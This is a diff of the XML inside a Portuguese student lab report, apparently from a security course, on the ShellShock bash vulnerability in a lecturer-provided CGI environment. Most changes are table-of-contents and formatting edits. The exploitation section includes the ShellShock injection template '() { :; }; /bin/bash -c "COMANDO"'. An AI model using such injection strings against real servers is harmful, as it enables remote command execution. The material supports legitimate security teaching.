+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="1200"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc213009135" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>2.1.2.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:kern w:val="2"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:eastAsia="en-GB"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>Utilização do CodeQL</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213009135 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>5</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="1200"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:kern w:val="2"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc213009136" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>2.1.3.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+                <w:noProof/>
+                <w:kern w:val="2"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:eastAsia="en-GB"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:lang w:val="pt-PT"/>
+              </w:rPr>
+              <w:t>Análise do código</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc213009136 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>6</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:r>
+            <w:rPr>
+              <w:b/>
+              <w:bCs/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:p>
+      </w:sdtContent>
+    </w:sdt>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading1"/>
         <w:ind w:firstLine="720"/>
         <w:rPr>
@@ -11,13 +1477,16 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
+      <w:bookmarkStart w:id="0" w:name="_Toc213009127"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Introdução</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -46,6 +1515,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="1" w:name="_Toc213009128"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -63,6 +1533,7 @@
         </w:rPr>
         <w:t>ShellShock</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="1"/>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
@@ -118,14 +1589,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> usada para executar comandos </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">nos terminais de sistemas baseados em </w:t>
+        <w:t xml:space="preserve"> usada para executar comandos nos terminais de sistemas baseados em </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -239,6 +1703,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="2" w:name="_Toc213009129"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -253,6 +1718,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> do ambiente</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="2"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -268,21 +1734,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">Para estudar esta </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>vulnerabilidade</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, o docente disponibilizou uma </w:t>
+        <w:t xml:space="preserve">Para estudar esta vulnerabilidade, o docente disponibilizou uma </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -360,6 +1812,7 @@
         <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -369,7 +1822,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7438DE22" wp14:editId="64B4EA06">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7438DE22" wp14:editId="7A91595F">
             <wp:extent cx="3333750" cy="2824514"/>
             <wp:effectExtent l="19050" t="19050" r="19050" b="13970"/>
             <wp:docPr id="797099606" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
@@ -384,7 +1837,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId5" cstate="print">
+                    <a:blip r:embed="rId8" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -427,45 +1880,39 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i w:val="0"/>
           <w:iCs w:val="0"/>
-        </w:rPr>
-        <w:t>Figura</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figura </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i w:val="0"/>
           <w:iCs w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i w:val="0"/>
           <w:iCs w:val="0"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="begin"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i w:val="0"/>
           <w:iCs w:val="0"/>
-        </w:rPr>
-        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:fldChar w:fldCharType="separate"/>
       </w:r>
@@ -475,6 +1922,7 @@
           <w:i w:val="0"/>
           <w:iCs w:val="0"/>
           <w:noProof/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>1</w:t>
       </w:r>
@@ -483,6 +1931,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i w:val="0"/>
           <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:fldChar w:fldCharType="end"/>
       </w:r>
@@ -491,6 +1940,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i w:val="0"/>
           <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t xml:space="preserve"> - /</w:t>
       </w:r>
@@ -500,6 +1950,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i w:val="0"/>
           <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>cgi</w:t>
       </w:r>
@@ -509,6 +1960,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i w:val="0"/>
           <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>-bin/</w:t>
       </w:r>
@@ -518,6 +1970,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i w:val="0"/>
           <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>getenv.cgi</w:t>
       </w:r>
@@ -529,6 +1982,7 @@
         <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -553,7 +2007,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId6">
+                    <a:blip r:embed="rId9">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -610,6 +2064,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i w:val="0"/>
           <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:fldChar w:fldCharType="begin"/>
       </w:r>
@@ -627,6 +2082,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i w:val="0"/>
           <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:fldChar w:fldCharType="separate"/>
       </w:r>
@@ -645,6 +2101,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i w:val="0"/>
           <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:fldChar w:fldCharType="end"/>
       </w:r>
@@ -655,16 +2112,7 @@
           <w:iCs w:val="0"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> - </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>/</w:t>
+        <w:t xml:space="preserve"> - /</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -770,6 +2218,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="3" w:name="_Toc213009130"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -778,6 +2227,7 @@
         <w:lastRenderedPageBreak/>
         <w:t>Vulnerabilidade</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="3"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -889,16 +2339,7 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> via</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve"> via </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1460,6 +2901,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="4" w:name="_Toc213009131"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1467,6 +2909,7 @@
         </w:rPr>
         <w:t>Explorar a vulnerabilidade</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="4"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1615,8 +3058,9 @@
           <w:bCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>; };</w:t>
-      </w:r>
+        <w:t>; }; /bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1624,9 +3068,9 @@
           <w:bCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> /bin/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>bash</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1634,16 +3078,6 @@
           <w:bCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>bash</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
         <w:t xml:space="preserve"> -c “COMANDO”</w:t>
       </w:r>
       <w:r>
@@ -1652,6 +3086,13 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1660,6 +3101,7 @@
         <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -1686,7 +3128,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId7" cstate="print">
+                    <a:blip r:embed="rId10" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -1743,6 +3185,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i w:val="0"/>
           <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:fldChar w:fldCharType="begin"/>
       </w:r>
@@ -1760,6 +3203,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i w:val="0"/>
           <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:fldChar w:fldCharType="separate"/>
       </w:r>
@@ -1778,6 +3222,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i w:val="0"/>
           <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:fldChar w:fldCharType="end"/>
       </w:r>
@@ -1809,6 +3254,7 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:firstLine="720"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1820,7 +3266,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:tab/>
         <w:t xml:space="preserve">Na figura 3, é possível observar o uso da </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -1916,6 +3361,7 @@
         <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -1940,7 +3386,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId8">
+                    <a:blip r:embed="rId11">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -1997,6 +3443,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i w:val="0"/>
           <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:fldChar w:fldCharType="begin"/>
       </w:r>
@@ -2014,6 +3461,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i w:val="0"/>
           <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:fldChar w:fldCharType="separate"/>
       </w:r>
@@ -2032,6 +3480,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i w:val="0"/>
           <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:fldChar w:fldCharType="end"/>
       </w:r>
@@ -2075,35 +3524,14 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">Seguindo </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>o</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> enunciado do docente</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (alínea 2b)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, experimentou-se então criar um ficheiro na pasta </w:t>
+        <w:t>Seguindo o</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> enunciado do docente (alínea 2b), experimentou-se então criar um ficheiro na pasta </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2139,6 +3567,7 @@
         <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -2163,7 +3592,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId9">
+                    <a:blip r:embed="rId12">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -2220,6 +3649,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i w:val="0"/>
           <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:fldChar w:fldCharType="begin"/>
       </w:r>
@@ -2237,6 +3667,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i w:val="0"/>
           <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:fldChar w:fldCharType="separate"/>
       </w:r>
@@ -2255,6 +3686,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
